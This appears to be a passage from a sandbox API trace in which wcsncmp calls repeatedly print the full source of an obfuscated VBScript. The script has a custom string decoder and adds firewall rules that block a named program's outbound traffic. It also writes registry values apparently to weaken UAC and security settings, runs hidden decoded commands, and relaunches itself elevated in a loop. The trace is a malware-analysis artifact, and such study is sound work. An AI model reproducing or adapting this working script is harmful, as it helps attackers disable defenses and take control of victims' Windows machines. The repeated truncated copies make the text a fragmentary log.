bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.284] wcsncmp (_String1="dex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.284] wcsncmp (_String1="ex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.284] wcsncmp (_String1="x = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.284] wcsncmp (_String1=" = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd 